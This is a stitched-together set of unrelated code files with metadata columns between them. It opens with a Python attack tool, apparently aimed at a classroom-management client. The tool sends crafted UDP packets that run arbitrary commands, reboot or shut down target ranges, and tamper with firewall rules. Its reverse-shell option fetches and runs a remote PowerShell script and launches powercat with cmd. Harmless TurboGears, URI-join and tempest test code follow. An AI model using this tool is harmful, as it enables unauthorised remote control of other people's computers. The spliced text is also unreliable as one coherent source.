0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]]
basicCMD = {
'-msg': store[0],
'-c': store[1],
'-r': store[2],
'-s': store[3],
}
header = """
------------------- Github Repositories -------------------
详细说明请看项目文档
https://github.com/ht0Ruial/Jiyu_udp_attack
"""
parser = argparse.ArgumentParser(header)
parser.add_argument('-ip', type=str, help="ip 指定目标IP地址")
parser.add_argument('-p', type=int, default=4705, help="port 指定监听端口,默认端口为4705")
parser.add_argument(
'-msg', type=str, help="send_message发送消息 eg: -msg \"HelloWord!\"")
parser.add_argument(
'-c', type=str, help="command命令 eg: -c \"cmd.exe /c ipconfig\"")
parser.add_argument('-l', type=int, default=1, help="循环次数,默认为1")
parser.add_argument('-t', type=int, default=22, help="循环时间间隔,默认是22秒")
parser.add_argument('-e', type=str, choices=['r', 's', 'g', 'nc', 'break', 'continue'],
help="Extra Options加载额外的选项 eg:-e r"
)
subparsers = parser.add_subparsers(help='-e 参数的详细说明')
subparsers.add_parser('r', help='reboot 重启')
subparsers.add_parser('s', help='shutdown 关机')
subparsers.add_parser('g', help='独立选项,获取当前的ip地址以及学生端监听的端口')
subparsers.add_parser('nc', help='独立选项,反弹shell的机器需出网,退出可使用命令exit')
subparsers.add_parser('break', help='独立选项,脱离屏幕控制,需要管理员权限')
subparsers.add_parser('continue', help='独立选项,恢复屏幕控制')
args = parser.parse_args()
# 格式化要发送的消息
def format_b4_send(content):
arr = []
for ch in content:
tmp = ''.join(list(map(lambda x: hex(ord(x)), ch)))
if int(tmp, 16) > 0xff:
tmp = tmp[2:]
high = int((tmp[0] + tmp[1]), 16)
low = int((tmp[2] + tmp[3]), 16)
arr.append(low)
arr.append(high)
else:
high = 0
low = int((tmp[2] + tmp[3]), 16)
arr.append(low)
arr.append(high)
return arr
# 获取ip
def get_ip(ip):
target_host = []
if ip.find('.') == -1:
print('\nYou enter a error IP.')
print("Please enter the correct format of the IP again.")
sys.exit(0)
if ip.find('-') != -1:
ip_arr = ip.split('-')
ip_arrs = ip_arr[0].split('.')
if int(ip_arr[1]) > 254:
ip_arr[1] = '254'
for i in range(int(ip_arrs[3]), int(ip_arr[1]) + 1):
ip_arrs[3] = str(i)
target_host.append('.'.join(ip_arrs))
elif ip.find('/') == -1:
target_host.append(ip)
elif ip.find('/24') != -1:
ip_arr = ip.split('/')
ip_arrs = ip_arr[0].split('.')
for i in range(1, 255):
ip_arrs[3] = str(i)
target_host.append('.'.join(ip_arrs))
else:
print('\nYou enter a error IP.')
print("Please enter the correct format of the IP again.")
sys.exit(0)
return target_host
# 将要发送的消息打包成完整的指令
def pkg_sendlist(cmdtype, content):
arrs = format_b4_send(content)
if cmdtype == '-msg':
index = 56
result = basicCMD['-msg']
for elem in arrs:
result[index] = elem
index += 1
elif cmdtype == '-c':
index = 578
result = basicCMD['-c']
for elem in arrs:
result[index] = elem
index += 1
return result
# 发送
def send(send_list):
if len(send_list) == 0:
print("[-] error 请使用 -h 以获取命令帮助")
sys.exit(0)
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
target_host = get_ip(args.ip)
for times in range(args.l):
for i in target_host:
for abc in send_list:
payload = pack("%dB" % (len(abc)), *abc)
client.sendto(payload, (i, args.p))
if args.l == 1:
print("发送成功")
sys.exit(0)
print("第%s次执行完毕" % str(times + 1))
if times != args.l - 1:
sleep(args.t)
def creat_send_object():
send_list = []
# 获取命令内容
if args.msg:
send_list.append(pkg_sendlist('-msg', args.msg))
if args.c:
send_list.append(pkg_sendlist('-c', args.c))
if args.e == 'r':
send_list.append(basicCMD['-r'])
if args.e == 's':
send_list.append(basicCMD['-s'])
return send_list
def single_command():
if args.e == 'g':
try:
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
print("\nYour ip addres is:" + ip)
tasklist = popen("tasklist|find \"Student\"").read()
pattern = compile(r'[e]\s*\d{1,5}\s*[C]')
pid = (pattern.search(tasklist).group()[1:-1]).strip()
netstat = popen("netstat -ano |find \"{}\"".format(pid)).read()
pattern = compile(r"%s:\d{1,5}\s*[*]{1}" % ip)
netstat_pat = pattern.findall(netstat)
ports = [((i.strip(ip)[1:-1]).rstrip()) for i in netstat_pat]
print("\nYour student client possible ports are:" + ','.join(ports))
except:
pass
sys.exit(0)
elif args.e == 'break':
popen('sc config MpsSvc start= auto')
popen('net start MpsSvc')
popen('netsh advfirewall set allprofiles state on')
popen('netsh advfirewall firewall set rule name="StudentMain.exe" new action=block')
sleep(1)
system("cls")
sys.exit(0)
elif args.e == 'continue':
popen('netsh advfirewall firewall set rule name="StudentMain.exe" new action=allow')
sys.exit(0)
def netcat(num):
send_list = []
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
cmd = "powershell IEX (New-Object System.Net.Webclient).DownloadString('https://xss.pt/hYvg');powercat -c {} -p {} -e cmd".format(
ip, num)
send_list.append(pkg_sendlist('-c', cmd))
send(send_list)
def run_from_cmd():
try:
single_command()
if args.e != 'nc':
send_list = creat_send_object()
send(send_list)
sys.exit(0)
num = random.randint(1, 65535)
pool = Pool(processes=1)
pool.apply_async(netcat, (num,))
print("listening on [any] {} ...".format(num))
system(
"powershell IEX (New-Object System.Net.Webclient).DownloadString('https://xss.pt/hYvg');powercat -l -p {}".format(
num))
pool.close()
pool.join()
except Exception as e:
print("[-] %s" % e)
if __name__ == '__main__':
run_from_cmd()
| 66.394805
| 134
| 0.61701
| 3,887
| 25,562
| 4.035503
| 0.089786
| 1.392324
| 2.058651
| 2.723448
| 0.793
| 0.788219
| 0.779676
| 0.772536
| 0.766416
| 0.762081
| 0
| 0.455734
| 0.221853
| 25,562
| 385
| 135
| 66.394805
| 0.332864
| 0.001565
| 0
| 0.527378
| 0
| 0.005764
| 0.05224
| 0.003841
| 0
| 0
| 0.474194
| 0
| 0
| 1
| 0.023055
| false
| 0.002882
| 0.025937
| 0
| 0.060519
| 0.0317
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c4bbade26d073ae9d9453e4dd38ecbc1e9438941
| 13,857
|
py
|
Python
|
turbogears/widgets/tests/test_nested_widgets.py
|
timmartin19/turbogears
|
b5420cb7e55757d418d8fadb512dbd7803c4279c
|
[
"MIT"
] | null | null | null |
turbogears/widgets/tests/test_nested_widgets.py
|
timmartin19/turbogears
|
b5420cb7e55757d418d8fadb512dbd7803c4279c
|
[
"MIT"
] | 9
|
2015-01-27T19:13:56.000Z
|
2019-03-29T14:44:31.000Z
|
turbogears/widgets/tests/test_nested_widgets.py
|
timmartin19/turbogears
|
b5420cb7e55757d418d8fadb512dbd7803c4279c
|
[
"MIT"
] | 13
|
2015-04-14T14:15:53.000Z
|
2020-03-18T01:05:46.000Z
|
import re
import cherrypy
import turbogears.validators as validators
import turbogears.widgets as widgets
from turbogears.testutil import catch_validation_errors
from turbogears.widgets.meta import copy_schema
oldrequest = None
int_validator = validators.Int(if_empty=None)
s_validator = validators.Schema(age=int_validator, ignore_key_missing=True)
class Request:
validation_errors = {}
def setup_module():
global oldrequest
oldrequest = cherrypy.request
cherrypy.request = Request()
def teardown_module():
global oldrequest
cherrypy.request = oldrequest
#XXX: We ignore missing keys to make passing value easier in tests
class TestSchema(validators.Schema):
ignore_key_missing = True
class TestNestedWidgets:
form = widgets.TableForm(name = "myform", fields=[
widgets.TextField("name"),
widgets.TextField("age", validator=int_validator),
widgets.FieldSet("sub", fields = [
widgets.TextField("name"),
widgets.TextField("age", validator=int_validator),
widgets.FieldSet("sub2", fields = [
widgets.TextField("name"),
widgets.TextField("age",
validator=int_validator),
], validator = TestSchema()),
], validator = TestSchema()),
], validator = TestSchema())
def test_display(self):
"""
Checks if names fo the widgets are set correctly depending on their
path.
"""
output = self.form.render(dict(sub=dict(sub2=dict(age=22))), format='xhtml')
value_p = 'value="22"'
name_p = 'name="sub.sub2.age"'
assert (re.compile('.*'.join([value_p, name_p])).search(output) or
re.compile('.*'.join([name_p, value_p])).search(output))
output = self.form.render(dict(sub=dict(age=22)), format='xhtml')
value_p = 'value="22"'
name_p = 'name="sub.age"'
assert (re.compile('.*'.join([value_p, name_p])).search(output) or
re.compile('.*'.join([name_p, value_p])).search(output))
output = self.form.render(dict(sub=dict(age=22)), format='xhtml')
id_p = 'id="myform_sub_age"'
name_p = 'name="sub.age"'
assert (re.compile('.*'.join([value_p, id_p])).search(output) or
re.compile('.*'.join([id_p, value_p])).search(output))
output = self.form.render(dict(age=22), format='xhtml')
value_p = 'value="22"'
name_p = 'name="age"'
assert (re.compile('.*'.join([value_p, name_p])).search(output) or
re.compile('.*'.join([name_p, value_p])).search(output))
def test_validate_outermost(self):
values = dict(age="twenty")
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors.pop('age', False)
assert not errors
def test_validate_sub(self):
values = dict(sub=dict(age="twenty"))
values, errors = catch_validation_errors(self.form, values)
print values, errors
# check the outermost dict is not poluted with errors from the inner
# dicts
assert not errors.has_key('age')
errors = errors['sub']
assert errors.pop('age', False)
assert not errors
def test_validate_sub2(self):
values = dict(sub=dict(sub2=dict(age="twenty")))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert not errors.has_key('age')
errors = errors['sub']
print values, errors
assert not errors.has_key('age')
errors = errors['sub2']
print values, errors
assert errors.pop('age', False)
assert not errors
def test_validate_sub_and_sub2(self):
values = dict(sub=dict(age="fhg", sub2=dict(age="twenty")))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert not errors.has_key('age')
errors = errors['sub']
print values, errors
assert errors.pop('age', False)
errors = errors['sub2']
print values, errors
assert errors.pop('age', False)
assert not errors
def test_good_values(self):
values = dict(age=22, sub=dict(sub2=dict(age=20)))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors == {}
assert values['age'] == 22
def test_good_and_bad_values(self):
values = dict(age="ddd", sub=dict(age="20", sub2=dict()))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors.pop('age', False)
assert not errors
#assert values['sub']['age'] == 20
class TestNestedWidgetsWSchemaValidation:
form = widgets.TableForm(
name = "myform",
validator = s_validator,
fields=[
widgets.TextField("name"),
widgets.TextField("age"),
widgets.FieldSet(
name = "sub",
validator = s_validator,
fields = [
widgets.TextField("name"),
widgets.TextField("age"),
widgets.FieldSet(
name = "sub2",
validator = s_validator,
fields = [
widgets.TextField("name"),
widgets.TextField("age"),
]
),
]
),
]
)
def test_validate_sub_schema(self):
values = dict(sub=dict(age="twenty"))
values, errors = catch_validation_errors(self.form, values)
print values, errors
# check the outermost dict is not poluted with errors from the inner
# dicts
assert not errors.has_key('age')
errors = errors['sub']
assert errors.pop('age', False)
assert not errors
def test_good_and_bad_values_schema(self):
values = dict(age="ddd", sub=dict(age="20", sub2=dict()))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors.pop('age', False)
assert not errors
#assert values['sub']['age'] == 20
def test_good_values_schema(self):
values = dict(age=22, sub=dict(sub2=dict(age=20)))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors == {}
assert values['age'] == 22
def test_validate_sub_and_sub2_schema(self):
values = dict(sub=dict(age="fhg", sub2=dict(age="twenty")))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert not errors.has_key('age')
errors = errors['sub']
print values, errors
assert errors.pop('age', False)
errors = errors['sub2']
print values, errors
assert errors.pop('age', False)
assert not errors
def test_validate_sub2_schema(self):
values = dict(sub=dict(sub2=dict(age="twenty")))
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert not errors.has_key('age')
errors = errors['sub']
print values, errors
assert not errors.has_key('age')
errors = errors['sub2']
print values, errors
assert errors.pop('age', False)
def test_validate_outermost_schema(self):
values = dict(age="twenty")
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors.pop('age', False)
assert not errors
assert not errors
class TestNestedWidgetsWMixedValidation:
form = widgets.TableForm(
name = "myform",
validator = s_validator,
fields=[
widgets.TextField("name"),
widgets.TextField("age"),
widgets.TextField("number", validator=int_validator),
widgets.FieldSet(
name = "sub",
validator = s_validator,
fields = [
widgets.TextField("name"),
widgets.TextField("age"),
widgets.TextField("number", validator=int_validator),
widgets.FieldSet(
name = "sub2",
fields = [
widgets.TextField("name"),
widgets.TextField("age", validator=int_validator),
widgets.TextField("number", validator=int_validator),
]
),
]
),
]
)
def test_mixed_validators(self):
"""
Tests that schema validators and single validators can be mixed
safely.
"""
values = dict(
age="bad",
number="22",
sub=dict(
age="bad",
number="bad",
sub2=dict(
age="bad",
number="bad",
)
)
)
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors.pop('age', False)
#assert values['number'] == 22
# assert errors are not getting poluted errors from other levels of
# the tree
assert errors.keys() == ['sub']
errors = errors['sub']
assert errors.pop('age', False)
assert errors.pop('number', False)
assert errors.keys() == ['sub2']
errors = errors['sub2']
assert errors.pop('age', False)
assert errors.pop('number', False)
assert not errors
class InnerSchema(validators.Schema):
ignore_key_missing = True
age = int_validator
class MiddleSchema(validators.Schema):
ignore_key_missing = True
age = int_validator
sub2 = InnerSchema()
class OuterSchema(validators.Schema):
ignore_key_missing = True
age = int_validator
sub = MiddleSchema()
class TestNestedSchemaValidators:
#XXX: Age is always validated by the nested schemas, number is
# validated with widget validator.
form = widgets.TableForm(
name = "myform",
validator = OuterSchema(),
fields=[
widgets.TextField("age"),
widgets.TextField("number", validator=int_validator),
widgets.FieldSet(
name = "sub",
fields = [
widgets.TextField("age"),
widgets.TextField("number", validator=int_validator),
widgets.FieldSet(
name = "sub2",
fields = [
widgets.TextField("age"),
widgets.TextField("number", validator=int_validator),
]
),
]
),
]
)
def test_nested_schemas(self):
"""
Tests that we can nest schema validators safely.
"""
values = dict(
age="bad",
number="22",
sub=dict(
age="27",
number="bad",
sub2=dict(
age="bad",
number="bad",
)
)
)
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert errors.pop('age', False)
#assert values['number'] == 22
# assert errors are not getting poluted errors from other levels of
# the tree
assert errors.keys() == ['sub']
errors = errors['sub']
values = values['sub']
#XXX This assertion fails :(
#XXX But it's normal as the Schema doesn't convert good values in
# invalid Schemas, ATM
#assert values['age'] == 27
assert errors.pop('number', False)
assert errors.keys() == ['sub2']
errors = errors['sub2']
assert errors.pop('age', False)
assert errors.pop('number', False)
assert not errors
def test_nested_schemas_good_values(self):
values = dict(
age="21",
number="22",
sub=dict(
age="27",
number="28",
sub2=dict(
age="33",
number="34",
)
)
)
values, errors = catch_validation_errors(self.form, values)
print values, errors
assert not errors
assert (values["age"], values['number']) == (21, 22)
values = values['sub']
assert (values["age"], values['number']) == (27, 28)
values = values['sub2']
assert (values["age"], values['number']) == (33, 34)
def test_copy_schema():
"""Test that a validator schema can be copied."""
class UserSchema(validators.Schema):
user_name = validators.PlainText()
schema = copy_schema(UserSchema())
def test_copy_nested_schema():
"""Test that a nested validator schema can be copied."""
class PersonSchema(validators.Schema):
class namefields(validators.Schema):
firstname = validators.PlainText()
lastname = validators.PlainText()
class parents(validators.Schema):
class father(validators.Schema):
firstname = validators.PlainText()
lastname = validators.PlainText()
class mother(validators.Schema):
firstname = validators.PlainText()
lastname = validators.PlainText()
schema = copy_schema(PersonSchema())
| 30.189542
| 84
| 0.554305
| 1,442
| 13,857
| 5.217753
| 0.108183
| 0.060606
| 0.051967
| 0.064195
| 0.790936
| 0.764221
| 0.73126
| 0.716773
| 0.700691
| 0.660154
| 0
| 0.010902
| 0.331457
| 13,857
| 458
| 85
| 30.255459
| 0.801274
| 0.052248
| 0
| 0.708207
| 0
| 0
| 0.048315
| 0
| 0
| 0
| 0
| 0
| 0.173252
| 0
| null | null | 0
| 0.018237
| null | null | 0.069909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f20613ac931f56423a1ac558f26047bfad5c9379
| 6,742
|
py
|
Python
|
tests/uri/test_uri_joining.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 13
|
2015-01-07T19:39:02.000Z
|
2021-07-12T21:09:28.000Z
|
tests/uri/test_uri_joining.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 9
|
2015-06-14T11:37:26.000Z
|
2020-12-11T09:12:30.000Z
|
tests/uri/test_uri_joining.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 10
|
2015-05-28T05:51:46.000Z
|
2021-12-29T20:36:15.000Z
|
from __future__ import unicode_literals
import pytest
from httoop import URI
RFC1808_BASE = b'http://a/b/c/d;p?q#f'
RFC2396_BASE = b'http://a/b/c/d;p?q'
RFC3986_BASE = b'http://a/b/c/d;p?q'
SIMPLE_BASE = b'http://a/b/c/d'
uri_join = {
RFC3986_BASE: [
# RFC 3986 Normal examples
(b'g:h', b'g:h'),
(b'g', b'http://a/b/c/g'),
(b'./g', b'http://a/b/c/g'),
(b'g/', b'http://a/b/c/g/'),
(b'/g', b'http://a/g'),
(b'//g', b'http://g'),
(b'?y', b'http://a/b/c/d;p?y'),
(b'g?y', b'http://a/b/c/g?y'),
(b'#s', b'http://a/b/c/d;p?q#s'),
(b'g#s', b'http://a/b/c/g#s'),
(b'g?y#s', b'http://a/b/c/g?y#s'),
(b';x', b'http://a/b/c/;x'),
(b'g;x', b'http://a/b/c/g;x'),
(b'g;x?y#s', b'http://a/b/c/g;x?y#s'),
(b'', b'http://a/b/c/d;p?q'),
(b'.', b'http://a/b/c/'),
(b'./', b'http://a/b/c/'),
(b'..', b'http://a/b/'),
(b'../', b'http://a/b/'),
(b'../g', b'http://a/b/g'),
(b'../..', b'http://a/'),
(b'../../', b'http://a/'),
(b'../../g', b'http://a/g'),
# RFC 3986 abnormal examples),
(b'../../../g', b'http://a/g'),
(b'../../../../g', b'http://a/g'),
(b'/./g', b'http://a/g'),
(b'/../g', b'http://a/g'),
(b'g.', b'http://a/b/c/g.'),
(b'.g', b'http://a/b/c/.g'),
(b'g..', b'http://a/b/c/g..'),
(b'..g', b'http://a/b/c/..g'),
(b'./../g', b'http://a/b/g'),
(b'./g/.', b'http://a/b/c/g/'),
(b'g/./h', b'http://a/b/c/g/h'),
(b'g/../h', b'http://a/b/c/h'),
(b'g;x=1/./y', b'http://a/b/c/g;x=1/y'),
(b'g;x=1/../y', b'http://a/b/c/y'),
(b'g?y/./x', b'http://a/b/c/g?y/./x'),
(b'g?y/../x', b'http://a/b/c/g?y/../x'),
(b'g#s/./x', b'http://a/b/c/g#s/./x'),
(b'g#s/../x', b'http://a/b/c/g#s/../x'),
(b'http:g', b'http:g'),
# own examples
(b'//', b'http://a/b/c/d;p?q'),
(b'g%3ah', b'http://a/b/c/g:h'),
],
SIMPLE_BASE: [
(b'g:h', b'g:h'),
#(b'http:g', b'http://a/b/c/g'),
#(b'http:', b'http://a/b/c/d'),
(b'g', b'http://a/b/c/g'),
(b'./g', b'http://a/b/c/g'),
(b'g/', b'http://a/b/c/g/'),
(b'/g', b'http://a/g'),
(b'//g', b'http://g'),
(b'?y', b'http://a/b/c/d?y'),
(b'g?y', b'http://a/b/c/g?y'),
(b'g?y/./x', b'http://a/b/c/g?y/./x'),
(b'.', b'http://a/b/c/'),
(b'./', b'http://a/b/c/'),
(b'..', b'http://a/b/'),
(b'../', b'http://a/b/'),
(b'../g', b'http://a/b/g'),
(b'../..', b'http://a/'),
(b'../../g', b'http://a/g'),
(b'./../g', b'http://a/b/g'),
(b'./g/.', b'http://a/b/c/g/'),
(b'g/./h', b'http://a/b/c/g/h'),
(b'g/../h', b'http://a/b/c/h'),
#(b'http:g', b'http://a/b/c/g'),
#(b'http:', b'http://a/b/c/d'),
#(b'http:?y', b'http://a/b/c/d?y'),
#(b'http:g?y', b'http://a/b/c/g?y'),
#(b'http:g?y/./x', b'http://a/b/c/g?y/./x'),
],
RFC2396_BASE: [
(b'g:h', b'g:h'),
(b'g', b'http://a/b/c/g'),
(b'./g', b'http://a/b/c/g'),
(b'g/', b'http://a/b/c/g/'),
(b'/g', b'http://a/g'),
(b'//g', b'http://g'),
(b'g?y', b'http://a/b/c/g?y'),
(b'#s', b'http://a/b/c/d;p?q#s'),
(b'g#s', b'http://a/b/c/g#s'),
(b'g?y#s', b'http://a/b/c/g?y#s'),
(b'g;x', b'http://a/b/c/g;x'),
(b'g;x?y#s', b'http://a/b/c/g;x?y#s'),
(b'.', b'http://a/b/c/'),
(b'./', b'http://a/b/c/'),
(b'..', b'http://a/b/'),
(b'../', b'http://a/b/'),
(b'../g', b'http://a/b/g'),
(b'../..', b'http://a/'),
(b'../../', b'http://a/'),
(b'../../g', b'http://a/g'),
(b'', RFC2396_BASE),
(b'g.', b'http://a/b/c/g.'),
(b'.g', b'http://a/b/c/.g'),
(b'g..', b'http://a/b/c/g..'),
(b'..g', b'http://a/b/c/..g'),
(b'./../g', b'http://a/b/g'),
(b'./g/.', b'http://a/b/c/g/'),
(b'g/./h', b'http://a/b/c/g/h'),
(b'g/../h', b'http://a/b/c/h'),
(b'g;x=1/./y', b'http://a/b/c/g;x=1/y'),
(b'g;x=1/../y', b'http://a/b/c/y'),
(b'g?y/./x', b'http://a/b/c/g?y/./x'),
(b'g?y/../x', b'http://a/b/c/g?y/../x'),
(b'g#s/./x', b'http://a/b/c/g#s/./x'),
(b'g#s/../x', b'http://a/b/c/g#s/../x'),
],
# "normal" cases from RFC 1808:
RFC1808_BASE: [
(b'g:h', b'g:h'),
(b'g', b'http://a/b/c/g'),
(b'./g', b'http://a/b/c/g'),
(b'g/', b'http://a/b/c/g/'),
(b'/g', b'http://a/g'),
(b'//g', b'http://g'),
(b'g?y', b'http://a/b/c/g?y'),
(b'g?y/./x', b'http://a/b/c/g?y/./x'),
(b'#s', b'http://a/b/c/d;p?q#s'),
(b'g#s', b'http://a/b/c/g#s'),
(b'g#s/./x', b'http://a/b/c/g#s/./x'),
(b'g?y#s', b'http://a/b/c/g?y#s'),
(b'g;x', b'http://a/b/c/g;x'),
(b'g;x?y#s', b'http://a/b/c/g;x?y#s'),
(b'.', b'http://a/b/c/'),
(b'./', b'http://a/b/c/'),
(b'..', b'http://a/b/'),
(b'../', b'http://a/b/'),
(b'../g', b'http://a/b/g'),
(b'../..', b'http://a/'),
(b'../../', b'http://a/'),
(b'../../g', b'http://a/g'),
(b'', b'http://a/b/c/d;p?q#f'),
(b'g.', b'http://a/b/c/g.'),
(b'.g', b'http://a/b/c/.g'),
(b'g..', b'http://a/b/c/g..'),
(b'..g', b'http://a/b/c/..g'),
(b'./../g', b'http://a/b/g'),
(b'./g/.', b'http://a/b/c/g/'),
(b'g/./h', b'http://a/b/c/g/h'),
(b'g/../h', b'http://a/b/c/h'),
]
}
further = [
(b'http://a/b/c/de', b';x', b'http://a/b/c/;x'),
(b'a', b'b', b'b'), # don't duplicate filename
#pytest.mark.xfail((b'http:///', b'..','http:///'), reason='The // is stripped due to normalization.'),
(b'', b'http://a/b/c/g?y/./x', b'http://a/b/c/g?y/./x'),
#pytest.mark.xfail((b'', b'http://a/./g', b'http://a/./g'), reason='The dot is stripped due to normalization'),
(b'svn://pathtorepo/dir1', b'dir2', b'svn://pathtorepo/dir2'),
(b'svn+ssh://pathtorepo/dir1', b'dir2', b'svn+ssh://pathtorepo/dir2'),
(SIMPLE_BASE + b'/', b'foo', SIMPLE_BASE + b'/foo'),
(b'http://a/b/c/d/e/', b'../../f/g/', b'http://a/b/c/f/g/'),
(b'http://a/b/c/d/e', b'../../f/g/', b'http://a/b/f/g/'),
(b'http://a/b/c/d/e/', b'/../../f/g/', b'http://a/f/g/'),
(b'http://a/b/c/d/e', b'/../../f/g/', b'http://a/f/g/'),
(b'http://a/b/c/d/e/', b'../../f/g', b'http://a/b/c/f/g'),
(b'http://a/b/', b'../../f/g/', b'http://a/f/g/'),
]
for base, rel, abs_ in further:
uri_join.setdefault(base, []).append((rel, abs_))
@pytest.mark.parametrize('base,relative,expected', [(base, relative, expected) for base, relative_expected in uri_join.items() for (relative, expected) in relative_expected])
def test_uri_join(base, relative, expected):
uri = URI(base).join(relative)
assert uri == expected
@pytest.mark.parametrize('base,relative,expected', [(base, relative, expected) for base, relative_expected in uri_join.items() for (relative, expected) in relative_expected])
def test_uri_join_very_strict(base, relative, expected):
uri = URI(base).join(relative)
assert bytes(uri) == bytes(expected)
#@pytest.mark.parametrize('expected,got,relative', [(expected, bytes(URI(base).join(relative)), relative) for base, relative_expected in uri_join.items() for (relative, expected) in relative_expected])
#def test_uri_join_very_strict(expected, got, relative):
# assert expected == got
| 34.050505
| 201
| 0.449125
| 1,529
| 6,742
| 1.954872
| 0.05036
| 0.274339
| 0.299097
| 0.309133
| 0.809301
| 0.787889
| 0.753095
| 0.745065
| 0.738374
| 0.6728
| 0
| 0.008918
| 0.118511
| 6,742
| 197
| 202
| 34.22335
| 0.494027
| 0.125334
| 0
| 0.725146
| 0
| 0
| 0.489029
| 0.023133
| 0
| 0
| 0
| 0
| 0.011696
| 1
| 0.011696
| false
| 0
| 0.017544
| 0
| 0.02924
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
f21be65a5e64a32fdb21a9ffd41e6ecaf97d9df3
| 34,586
|
py
|
Python
|
nuage_tempest_plugin/tests/api/vsd_managed/test_vsd_public_resources_ml2.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2021-01-03T01:47:51.000Z
|
2021-01-03T01:47:51.000Z
|
nuage_tempest_plugin/tests/api/vsd_managed/test_vsd_public_resources_ml2.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | null | null | null |
nuage_tempest_plugin/tests/api/vsd_managed/test_vsd_public_resources_ml2.py
|
nuagenetworks/nuage-tempest-plugin
|
ac1bfb0709c7bbaf04017af3050fb3ed1ad1324a
|
[
"Apache-1.1"
] | 1
|
2020-10-16T12:04:39.000Z
|
2020-10-16T12:04:39.000Z
|
# Copyright 2018 NOKIA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from netaddr import IPNetwork
from tempest.lib import exceptions
from tempest.test import decorators
from nuage_tempest_plugin.lib.test import nuage_test
from nuage_tempest_plugin.lib.test import tags
from nuage_tempest_plugin.lib.topology import Topology
from nuage_tempest_plugin.tests.api.vsd_managed \
import base_vsd_managed_networks
from nuage_tempest_plugin.tests.api.vsd_managed \
import base_vsd_public_resources
OS_FULL_CIDR24_RANGE = 254 # .256 -1 (.0) -1 (.255)
VSD_L2_SHARED_MGD_OPT3_CIDR = IPNetwork('21.21.21.0/24')
VSD_L2_SHARED_MGD_OPT3_GW = '21.21.21.1'
VSD_L2_SHARED_MGD_OPT3 = '21.21.21.121'
VSD_L3_SHARED_MGD_OPT3_CIDR = IPNetwork('31.31.31.0/24')
VSD_L3_SHARED_MGD_OPT3_GW = '31.31.31.1'
VSD_L3_SHARED_MGD_OPT3 = '31.31.31.131'
#
VALID_CIDR = IPNetwork('3.22.111.0/24')
